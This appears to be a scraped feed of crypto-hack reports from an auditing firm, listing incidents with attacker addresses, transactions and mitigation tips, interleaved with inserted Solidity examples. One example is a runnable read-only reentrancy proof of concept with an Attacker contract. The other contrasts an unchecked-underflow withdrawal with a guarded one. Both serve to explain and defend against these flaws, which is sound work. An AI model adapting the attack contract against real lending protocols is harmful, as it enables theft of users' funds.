✔️ To detect potential vulnerabilities, regularly perform thorough code reviews and security audits by experts. 🔎@ImmuneBytes brings you a team of expert auditors who can sniff out all potential vulnerabilities in your contract that might become a doorway for hackers. Set up a free consultation call here: immunebytes.com/contact-us/ or t.me/immunebytes
✔️ Implementing Reentrancy Guards is an effective strategy against such attacks. The ReentrancyGuard from OpenZeppelin is commonly used by developers across the Web3 space. immunebytes.com/blog/shield-yo…
✔️ Ensure that the state is updated before any external calls are made. This can prevent the attacker from reentering the contract with the old state.
✔️ If using call, set a fixed gas limit for external calls to mitigate the risk of reentrancy attacks by limiting the amount of gas the called function can consume.
✔️ Prefer pull payment models over push payment models. In a pull payment model, users withdraw their funds instead of the contract sending funds to users automatically.
✔️ Leverage well-audited libraries and contracts, such as those provided by OpenZeppelin, to benefit from community scrutiny and best practices.

Technical Details of the Hack
Exploiter Address: etherscan.io/address/0x1e84…
Exploited Contract: etherscan.io/address/0x5927…
Exploit Txn: etherscan.io/tx/0xeb87ebc0a…

#Hacked #exploited #crypto #CryptoInvestor #CryptoInvestment #CryptoInvesting #cryptomarket #CryptoCommunity #web3community #bugbountytips #Blockchain #Blockchain101 #WEB3 #web3community #web3jobs #BugBounty #blockchaintechnology #blockchaindevelopment #blockchaingaming #blockchainrevolution #blockchaineducation #blockchains #blockchaincommunity #blockchainjobs #blockchainsecurity #blockchaindevelopers #blockchainsolutions #blockchaintech #web3development #web3education #web3event #cryptocurrency #cryptocurrencynews #cryptocurrencies #cryptonews #bugbountytip #cryptowallet #smartcontracts #SmartContractSecurity
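Read-only reentrancy, which the post above names as the Sturdy root cause, is different from the classic kind: the pool's own nonReentrant guard holds, but a view function on the pool (the LP token "rate") is read by a third contract while the pool is mid-operation and its storage is half-updated. The block below is a toy model added for this page, not Balancer's or Sturdy Finance's code; Pool, Lender, Attacker, getRateSafe() and the ether amounts are all assumptions. Note that the reentrancy-guard item in the post's list is necessary but not sufficient here: the guard in Pool is in place and still the lender is misled, because nothing guards the read.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Added illustration of read-only reentrancy; a toy model, not Balancer's or
// Sturdy Finance's code. Pool, Lender, Attacker and getRateSafe() are assumptions.

contract Pool {
    uint256 public totalSupply;
    mapping(address => uint256) public balanceOf;
    uint256 public reserve;     // ETH the pool believes it holds
    uint256 private lock = 1;   // 1 = idle, 2 = inside join/exit

    modifier nonReentrant() { require(lock == 1, "reentrant"); lock = 2; _; lock = 1; }

    // ETH per share, 1e18-scaled. Correct only when reserve and totalSupply were
    // updated together, which is not the case mid-exit below.
    function getRate() public view returns (uint256) {
        return totalSupply == 0 ? 1e18 : reserve * 1e18 / totalSupply;
    }

    // Hardened view: refuses to answer while the pool is mid-operation. Balancer's
    // fix for its vault works the same way (a check that reverts if the lock is held).
    function getRateSafe() external view returns (uint256) {
        require(lock == 1, "pool is mid-operation");
        return getRate();
    }

    function join() external payable nonReentrant {
        uint256 shares = totalSupply == 0 ? msg.value : msg.value * totalSupply / reserve;
        reserve += msg.value;
        totalSupply += shares;
        balanceOf[msg.sender] += shares;
    }

    // Bug: shares are burned, ETH is sent (handing control to the caller), and
    // only then is `reserve` reduced. nonReentrant stops a second join/exit, but
    // nothing stops a read of getRate() while reserve still holds the old value.
    function exit(uint256 shares) external nonReentrant {
        uint256 eth = shares * reserve / totalSupply;
        balanceOf[msg.sender] -= shares;
        totalSupply -= shares;
        (bool ok, ) = msg.sender.call{value: eth}("");
        require(ok, "send failed");
        reserve -= eth;
    }
}

// A lender that values pool shares as collateral using the pool's unguarded rate.
contract Lender {
    Pool public immutable pool;
    constructor(Pool _pool) { pool = _pool; }
    function collateralValue(address who) external view returns (uint256) {
        return pool.balanceOf(who) * pool.getRate() / 1e18;
    }
}

contract Attacker {
    Pool immutable pool;
    Lender immutable lender;
    uint256 public valueDuringCallback;
    bool public safeViewReverted;
    constructor(Pool p, Lender l) { pool = p; lender = l; }

    // Join, then exit half the position; the callback below fires mid-exit.
    function attack() external payable {
        pool.join{value: msg.value}();
        pool.exit(pool.balanceOf(address(this)) / 2);
    }

    receive() external payable {
        // A real exploit would borrow against the inflated value at this point.
        valueDuringCallback = lender.collateralValue(address(this));
        try pool.getRateSafe() { safeViewReverted = false; }
        catch { safeViewReverted = true; }
    }
}

// Send 100 ether to run(): 90 ether seeds the pool as honest liquidity, 10 ether
// is the attacker's. Compare the collateral value the lender reports during the
// callback with the value after the exit settles; the guarded view refuses mid-exit.
contract Demo {
    function run() external payable returns (uint256 valueDuring, uint256 valueAfter, bool guardedViewReverted) {
        require(msg.value == 100 ether, "send 100 ether");
        Pool pool = new Pool();
        pool.join{value: 90 ether}();
        Lender lender = new Lender(pool);
        Attacker a = new Attacker(pool, lender);
        a.attack{value: 10 ether}();
        valueDuring = a.valueDuringCallback();
        valueAfter = lender.collateralValue(address(a));
        guardedViewReverted = a.safeViewReverted();
    }
}
```

The inflation scales with the size of the exit relative to the pool, which is what a flash loan buys the attacker. Two fixes apply and are best combined: the pool updates `reserve` before the transfer (the checks-effects-interactions item in the post's list), and any contract that prices the pool's shares reads a view that reverts while the pool's lock is held rather than the raw rate.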
Naveen retweeted
MEV Bot service provider @JokInTheBoxETH on the #ethereum chain suffered an exploit on June 11 and lost ~💰$34K worth of its assets. The lost assets include ~109 billion $JOK, which were swapped for 9.12 ETH by the attacker post-hack.

Team @JokInTheBoxETH acknowledged the exploit through a post on their official X handle and stated that, to compensate the users affected in the exploit, they would airdrop the exact amount of tokens each user staked and lost on the platform within 24h. They also reassured the community of their commitment to the platform's stability and value by announcing a token buyback and burn strategy. In an effort to reduce the circulating supply, they will buy back 110B $JOK tokens from the market over time and burn them, demonstrating their dedication to the community's long-term interests.

The exact reason behind the exploit is not known yet, but the exploit is currently being investigated.

Attacker: etherscan.io/address/0xfcd4…
Attack contract: etherscan.io/address/0x9d34…
Attack Txn: etherscan.io/tx/0xd14f5d518…
Target contract: etherscan.io/address/0xa644… (JokInTheBoxStaking)

#Hacked #exploited #crypto #CryptoInvestor #CryptoInvestment #CryptoInvesting #cryptomarket #CryptoCommunity #web3community #bugbountytips #Blockchain #Blockchain101 #WEB3 #web3community #web3jobs #BugBounty #blockchaintechnology #blockchaindevelopment #blockchaingaming #blockchainrevolution #blockchaineducation #blockchains #blockchaincommunity #blockchainjobs #blockchainsecurity #blockchaindevelopers #blockchainsolutions #blockchaintech #web3development #web3education #web3event #cryptocurrency #cryptocurrencynews #cryptocurrencies #cryptonews #bugbountytip #cryptowallet #smartcontracts #SmartContractSecurity
Naveen retweeted
The Defi protocol @UwU_Lend was exploited in an attack on June 10, resulting in the loss of ~💰$20M worth of crypto assets.
The Attack
The initial analysis indicates that the attacker (who was initially funded by Tornado Cash) carried out the attack using Oracle price manipulation in tandem with flash loans. The sUSDE price fetched by sUSDePriceProviderBUniCatch (0xd252953818bdf8507643c237877020398fa4b2e8) is decided by five oracles, namely FRAXUSDe, USDeUSDC, USDeDAI, USDecrvUSD, and GHOUSDe. The attacker cleverly manipulated the price of these five oracles to artificially inflate the price of sUSDE.
💡immunebytes.com/blog/what-are-…
This attack was conducted from a single wallet address, and it stole several tokens, including wrapped ether (WETH), wrapped bitcoin (WBTC), and stablecoins. The attack took place in three transactions, and the hacker swapped the stolen assets for ETH and split them into the following two Ethereum wallets through the decentralized exchange Uniswap.
etherscan.io/address/0x48D7…
etherscan.io/address/0x050c…
Attacker Address: etherscan.io/address/0x841d…
Attack Transactions:
etherscan.io/tx/0x242a0fb4f…
etherscan.io/tx/0xb3f067618…
etherscan.io/tx/0xca1bbf3b3…
The UwU Lend Controversy
UwU Lend was founded by Quadriga CX co-founder Michael “Sifu” Patryn, who is not new to controversy. When Quadriga CX collapsed in 2022, it was found that an address linked to him transferred $5.5 million worth of ether (ETH) to Tornado Cash. He is also connected with the defi cryptocurrency project Wonderland, which he ran pseudonymously before his identity was revealed. As soon as this fact came to light, the protocol suffered a meltdown.
💡immunebytes.com/blog/list-of-o…
Naveen retweeted
🏴‍☠️ On This Day: Revisiting Past 😈#Crypto #Hacks
On June 10, 2023, Atlantis Loans (an abandoned project on the BNB Chain) experienced a governance attack, which resulted in a loss of over 💰$1 million. The exploiter managed to establish themselves as the administrator of the token's proxy contract, thereby gaining control and manipulating its functionalities. Any users who had granted approvals for the Atlantis Loan contract and had not revoked them had funds extracted from their wallets.
The detailed hack analysis can be found here: 🔎immunebytes.com/blog/atlantis-…
Governance attacks in the cryptocurrency context refer to malicious or manipulative actions aimed at influencing the governance mechanisms of a blockchain or decentralized organization (such as a Decentralized Autonomous Organization, or DAO) for personal gain or to cause disruption.
Must Read:
💡immunebytes.com/blog/what-are-…
💡immunebytes.com/blog/exploring…
Here are some common forms of governance attacks:
- 51% Attack: If an entity controls the majority of the voting power (or stake in proof-of-stake systems), they can unilaterally make decisions, passing proposals that benefit them even if these proposals are harmful to the network. 💡immunebytes.com/blog/51-attack…
- Sybil Attack: An attacker creates multiple identities to gain a disproportionate influence over the voting process. This is easier in systems where the cost of creating new identities is low. 💡immunebytes.com/blog/is-sybil-…
- Front-Running: In blockchain systems, proposals and votes are often public. Attackers can see upcoming proposals and position themselves to influence the outcome before other stakeholders can react. 💡immunebytes.com/blog/front-run…
- Proposal Manipulation: Attackers can submit misleading or malicious proposals that appear beneficial on the surface but contain hidden mechanisms or clauses that serve their interests.
- Snapshot Manipulation: Manipulating the timing of when snapshots of token holdings are taken for voting purposes, allowing attackers to temporarily acquire tokens just long enough to influence a vote, and then offload them.
Naveen retweeted
On June 9, the Defi ZK-rollup protocol @loopringorg on the #ethereum chain was exploited for ~💰1373 $ETH worth ~💰$5M.
How Did the Hack Happen?
The hacker breached the security (2FA service) of the Loopring Official Guardian wallet and obtained the required privileges to pose as a wallet owner, only to reset ownership later. This enabled the exploiter to initiate the recovery process from the Official Guardian wallet and withdraw assets.
To contain the hack and protect user funds, the Guardian-related and 2FA-related operations have been temporarily suspended. To obfuscate the stolen funds trail, the exploiter has already started moving funds to different addresses. Loopring is in touch with law enforcement and professional security teams to track down the exploiter.
While the hack is being investigated, the possible reason for the breach of 2FA security could be SIM swap fraud.
💡Learn about SIM swap frauds here: immunebytes.com/blog/how-to-pr…
💡Evaluate the security of your crypto wallets after gaining insights about crypto wallet security here: immunebytes.com/blog/how-to-ma…
Hacker Addresses:
etherscan.io/address/0x44f8…
etherscan.io/address/0xbace…
Hack Txns:
etherscan.io/tx/0x2ab212f02…
etherscan.io/tx/0xb6aaa3917…
Naveen retweeted
Velocore, the decentralized exchange (DEX) protocol on zkSync and Linea, was hacked on June 2, causing a loss of ~💰$10M of the users’ funds. The root cause of the hack has been found to be the vulnerabilities within the Balancer-style CPMM pool contract.
The Vulnerabilities
There was a flaw in the logic within the `velocore__execute()` function of the ConstantProductPool. Along with that, there was also an underflow vulnerability which comes into play when withdrawing LP into a single token. On top of that, there was an additional vulnerability due to which the `velocore__execute()` function does not verify whether the caller is the Vault.
The attacker, who was initially funded from Tornado Cash, exploited these vulnerabilities in conjunction with flash loans to carry out the attack. The stolen funds were later bridged via the Across Bridge and finally deposited back into Tornado Cash.
Learn How Underflow and Overflow Vulnerabilities Can Prove to Be Fatal in an Attack: immunebytes.com/blog/explained…
Hack Status
As per the official update by Team Velocore:
- All volatile pools (CPMM) in Linea and zkSync Era Velocore are affected.
- No stable pools are affected.
- The vulnerabilities have been taken care of to avoid any further exploit.
- A snapshot of the blockchain state prior to the incident has already been taken.
- The affected users will be duly compensated once the operations are resumed.
- Efforts are ongoing to track, freeze and recover the stolen funds by collaborating with various exchanges and security partners.
- An on-chain negotiation with the hacker is also being contemplated.
Balancer-style CPMM pool contract: github.com/velocore/veloc…
Attacker address: 0x8cdc37ed79c5ef116b9dc2a53cb86acaca3716bf
Stolen funds are currently parked at: 0xe4062fcade7ac0ed47ad794028967a2314ee02b3
EOA:
0x8cdc37ed79c5ef116b9dc2a53cb86acaca3716bf
0xd8c465ecd8c6f1a0c114890f1ef553f82e59d274
Affected Contracts:
0xed4e130f6f9e68918996f7e1e46a3306b3e12cec
0xb7f6354b2cfd3018b3261fbc63248a56a24ae91a
0xc030fba4b741b770f03e715c3a27d02c41fc9dae
0xf7f76b30a301524fe76508546B1e3762eF2B9267
Hack Txs:
lineascan.build/tx/0xed11d5b01…
lineascan.build/tx/0x37434e674…
explorer.zksync.io/tx/0x4156d73ca…
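As an added illustration (not Velocore's code or anything from the post above), a hypothetical, heavily simplified pool contract showing the two defensive checks the post describes as missing: a Vault-only guard on the execute-style hook and explicit bounds on a single-token LP withdrawal. The contract name, function names, `onlyVault` modifier and the constructed reserve value are all assumptions.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Hypothetical example contract (not Velocore's). It puts the vulnerable shape
// and the hardened shape side by side so the two missing checks are visible.
contract HardenedPoolExample {
    address public immutable vault;          // only the Vault may drive withdrawals
    uint256 public reserve;                  // constructed sample reserve, in token units
    mapping(address => uint256) public lpBalance;

    error NotVault(address caller);
    error InsufficientLiquidity(uint256 requested, uint256 available);

    // Caller check that the post says the execute hook lacked.
    modifier onlyVault() {
        if (msg.sender != vault) revert NotVault(msg.sender);
        _;
    }

    constructor(address vault_) {
        vault = vault_;
        reserve = 1_000_000;                 // constructed value for the example
    }

    // Vulnerable shape: no caller restriction, and the subtraction runs inside
    // an unchecked block, so a withdrawal larger than the balance wraps around
    // to a huge number instead of reverting (the underflow failure mode).
    function withdrawSingleUnchecked(address user, uint256 amount) external returns (uint256) {
        unchecked {
            lpBalance[user] -= amount;       // wraps on underflow
            reserve -= amount;               // wraps on underflow
        }
        return amount;
    }

    // Hardened shape: only the Vault may call it, and explicit pre-checks reject
    // an over-withdrawal with a named error. Solidity 0.8 checked arithmetic
    // would also revert here, but the explicit guard documents the invariant.
    function withdrawSingle(address user, uint256 amount) external onlyVault returns (uint256) {
        uint256 bal = lpBalance[user];
        if (amount > bal) revert InsufficientLiquidity(amount, bal);
        if (amount > reserve) revert InsufficientLiquidity(amount, reserve);
        lpBalance[user] = bal - amount;
        reserve -= amount;
        return amount;
    }
}
```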
Naveen retweeted
On This Day: Revisiting Past 😈#Crypto #Hacks
May 29 marks the day of multiple hacks in the Web3 space.
📌On May 29, 2021, defi Belt Finance @BELT_Finance on Binance Smart Chain (BSC) came under a flash loan attack and lost ~$6.2M worth of cryptocurrencies. The exploiter deployed a smart contract leveraging PancakeSwap for flash loans and exploited the beltBUSD pool along with its underlying strategy protocols. Subsequently, they executed the contract eight times, yielding a total profit of 6,234,753 BUSD.
📌On May 29, 2023, dex @EDE_Finance on the #Arbitrum chain fell victim to a white hat exploit, which was conducted using flash loans and Oracle price manipulation. The white hat hacker, who profited 597,694 USDC and 86,222 USDT (worth ~$520K at the time of the hack), offered to return 90% of the stolen funds in exchange for a 10% bug bounty.
Exploited contract: arbiscan.io/address/0x171c…
Attacker Address: arbiscan.io/address/0x8082…
Attacker’s contract: arbiscan.io/address/0x6dd3…